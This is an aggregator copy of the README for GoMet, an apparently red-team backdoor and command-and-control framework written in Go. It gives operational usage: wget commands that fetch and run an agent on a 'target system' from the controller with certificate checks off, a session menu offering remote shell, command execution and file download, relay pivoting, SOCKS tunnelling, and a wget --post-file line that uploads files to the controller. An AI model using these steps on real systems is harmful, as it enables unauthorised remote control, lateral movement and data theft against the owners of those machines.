GitHub - mimah/GoMet: Multi-platform backdoor in Go. TCP forwarding, socks5, tun...
source link: https://github.com/mimah/GoMet
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
README.md
GoMet
Simple multi-platform agent and its controller. The agent communicates with its controller through TLS tunnel.
Work in progress :)
Build
Install Go (https://golang.org/dl/).
Download dependencies.
cd gomet
go get github.com/abiosoft/[email protected]+incompatible
go get github.com/ginuerzh/[email protected]
go get github.com/gorilla/[email protected]
go get github.com/xtaci/[email protected]
cd ..
And compile GoMet.
go build .
Basic usage
Launch GoMet
#> ./GoMet
____ __ __ _
/ ___| ___ | \/ | ___| |_
| | _ / _ \| |\/| |/ _ \ __|
| |_| | (_) | | | | __/ |_
\____|\___/|_| |_|\___|\__|
by Mimah
server > info
Local listener: 0.0.0.0:8888
Socks listener: 127.0.0.1:9050
HTTP magic: khRoKbh3AZSHbix
server >
server > help
Commands:
clear clear the screen
exit Exit
generate Generate an agent
help display help
info Print server information
routes List routes
sessions List sessions
On the target system download an agent for the corresponding OS and Architecture
wget https://<controller>:8888/khRoKbh3AZSHbix/agent/darwin/amd64 --no-check-certificate -O agent
The controller automatically builds an agent with the right information.
Note: "khRoKbh3AZSHbix" is a random magic generated by the controller, type "info" in the GoMet CLI to know it. In this use-case you have to add --no-check-certificate option because the default TLS certificate is auto-signed.
Available OS (see Golang GOOS):
linux
darwin
windows
solaris
...
Available Architectures (see Golang GOARCH):
386
amd64
arm
arm64
...
Launch the agent
chmod +x agent
./agent
In GoMet CLI we can see the new session created
server > New session 1 - <agent_hostname> - <agent_IP>:<agent_port> - darwin/amd64
Interact with a session
server > sessions open 1
session 1 > help
Commands:
cat Print a file
clear clear the screen
close Close session
connect Connect a local port to a remote Address
download Download a file
execute Execute a command
exit Back to server
getuid Get user Id
help display help
jobs List jobs
listen Connect a remote port to a local Address
ls List files
netstat List connections
ps List processes
pwd Get current directory
relay Relay listen
shell Interactive remote shell
streams List streams
upload Upload a file
session 1 >
TCP forwarding
We can forward TCP connection through the agent TLS tunnel in both direction.
connect
Listen a port locally (on the controller system) and forward it to a remote service.
listen
Listen a port remotely (on the agent system) and forward it to a local service.
Socks5 and routing
We can enable a Socks5 listener on the controller to access remote networks through the agents and define routes toward the different sessions.
Make a relay
If the controller is not accessible from the target system (after network pivot) we can define a "relay" on another agent. Then we can access the controller through the relay like the controller itself.
session 1 > relay
Remote Address: 0.0.0.0:9999
session 1 >
And from the target system
wget https://<relay>:9999/khRoKbh3AZSHbix/agent/darwin/amd64 --no-check-certificate -O agent
Share files with the controller
The controller can share files.
Copy a file in the share directory and download it with the magic URL
wget https://<controller>:8888/khRoKbh3AZSHbix/my_file --no-check-certificate
We can also upload a file to the controller
wget https://<controller>:8888/khRoKbh3AZSHbix/other_file --no-check-certificate --post-file file
Generate an agent with the CLI
server > generate
OS: windows
Arch: amd64
Host: <controller>:8888
HTTP proxy:
HTTPS proxy:
Proxy username:
Proxy password:
Generated agent URL: https://<controller>:8888/Ye8o14kw1rpMJ8f/ySUxt7YT8X5fyat
server >
Configuration files
Default configuration is defined in config/config.json file.
{
"listenAddr":"0.0.0.0:8888",
"socks": {
"enable": true,
"addr": "127.0.0.1:9050"
},
"api": {
"enable": false,
"addr": "127.0.0.1:9000"
}
}
Define a tunnel
If we want to listen through a tunnel we can define it in the configuration file. SSH only actually.
{
"listenAddr":"0.0.0.0:8888",
"socks": {
"enable": true,
"addr": "127.0.0.1:9050"
},
"tunnel": {
"listenAddr":"<exit_node>:8888",
"nodes": [
{
"type":"ssh",
"host": "<first_node>:22",
"username": "user",
"password": "user"
},
{
"type":"ssh",
"host": "<second_node>:22",
"username": "user",
"password": "user"
},
{
"type":"ssh",
"host": "<exit_node>:22",
"username": "user",
"password": "user"
}
]
}
}
Custom TLS certificate
A default certificate is generated in the config directory. You can replace it with yours.
Warning: If you change the certificate you have rebuild all the agents because the certificate hash will not be the same.
HTTP API
Work in progress
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK